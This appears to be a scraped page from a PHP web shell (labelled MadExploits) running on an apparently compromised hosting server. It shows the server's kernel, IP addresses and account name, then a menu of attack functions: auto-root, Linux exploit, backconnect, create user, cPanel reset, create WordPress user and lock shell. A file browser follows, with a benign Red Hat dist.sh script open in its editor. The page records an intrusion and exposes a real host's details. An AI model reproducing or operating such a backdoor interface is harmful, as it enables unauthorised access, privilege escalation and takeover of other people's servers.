Linux musi.iixcp.rumahweb.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
LiteSpeed
: 103.247.9.165 | : 216.73.216.132
Cant Read [ /etc/named.conf ]
7.4.33
pliq4844
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
rpm /
redhat /
[ HOME SHELL ]
Name
Size
Permission
Action
brp-fix-pyc-reproducibility
560
B
-rwxr-xr-x
brp-ldconfig
417
B
-rwxr-xr-x
brp-mangle-shebangs
4.41
KB
-rwxr-xr-x
brp-python-bytecompile
5.64
KB
-rwxr-xr-x
brp-strip-lto
575
B
-rwxr-xr-x
compileall2.py
21.59
KB
-rw-r--r--
config.guess
42.91
KB
-rwxr-xr-x
config.sub
35.46
KB
-rwxr-xr-x
dist.sh
1.94
KB
-rwxr-xr-x
find-provides
1.19
KB
-rwxr-xr-x
find-requires
1013
B
-rwxr-xr-x
gpgverify
3.54
KB
-rwxr-xr-x
kmodtool
9.03
KB
-rwxr-xr-x
macros
15.85
KB
-rw-r--r--
redhat-annobin-cc1
89
B
-r--r--r--
redhat-annobin-plugin-select.s...
6.05
KB
-rwxr-xr-x
redhat-annobin-select-annobin-...
89
B
-r--r--r--
redhat-annobin-select-gcc-buil...
93
B
-r--r--r--
redhat-hardened-cc1
153
B
-r--r--r--
redhat-hardened-clang.cfg
6
B
-r--r--r--
redhat-hardened-ld
47
B
-r--r--r--
rpmrc
5.52
KB
-rw-r--r--
rpmsort
2.11
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dist.sh
#!/usr/bin/bash # dist.sh # Author: Tom "spot" Callaway <tcallawa@redhat.com> # License: GPL # This is a script to output the value for the %{dist} # tag. The dist tag takes the following format: .$type$num # Where $type is one of: el, fc, rh # (for RHEL, Fedora Core, and RHL, respectively) # And $num is the version number of the distribution. # NOTE: We can't detect Rawhide or Fedora Test builds properly. # If we successfully detect the version number, we output the # dist tag. Otherwise, we exit with no output. RELEASEFILE=/etc/redhat-release function check_num { MAINVER=`cut -d "(" -f 1 < $RELEASEFILE | \ sed -e "s/[^0-9.]//g" -e "s/$//g" | cut -d "." -f 1` echo $MAINVER | grep -q '[0-9]' && echo $MAINVER } function check_rhl { grep -q "Red Hat Linux" $RELEASEFILE && ! grep -q "Advanced" $RELEASEFILE && echo $DISTNUM } function check_rhel { egrep -q "(Enterprise|Advanced|CentOS|CloudLinux)" $RELEASEFILE && echo $DISTNUM } function check_fedora { grep -q Fedora $RELEASEFILE && echo $DISTNUM } DISTNUM=`check_num` DISTFC=`check_fedora` DISTRHL=`check_rhl` DISTRHEL=`check_rhel` if [ -n "$DISTNUM" ]; then if [ -n "$DISTFC" ]; then DISTTYPE=fc elif [ -n "$DISTRHEL" ]; then DISTTYPE=el elif [ -n "$DISTRHL" ]; then DISTTYPE=rhl fi fi [ -n "$DISTTYPE" -a -n "$DISTNUM" ] && DISTTAG=".${DISTTYPE}${DISTNUM}" case "$1" in --el) echo -n "$DISTRHEL" ;; --fc) echo -n "$DISTFC" ;; --rhl) echo -n "$DISTRHL" ;; --distnum) echo -n "$DISTNUM" ;; --disttype) echo -n "$DISTTYPE" ;; --help) printf "Usage: $0 [OPTIONS]\n" printf " Default mode is --dist. Possible options:\n" printf " --el\t\tfor RHEL version (if RHEL)\n" printf " --fc\t\tfor Fedora version (if Fedora)\n" printf " --rhl\t\tfor RHL version (if RHL)\n" printf " --dist\t\tfor distribution tag\n" printf " --distnum\tfor distribution number (major)\n" printf " --disttype\tfor distribution type\n" ;; *) echo -n "$DISTTAG" ;; esac
Close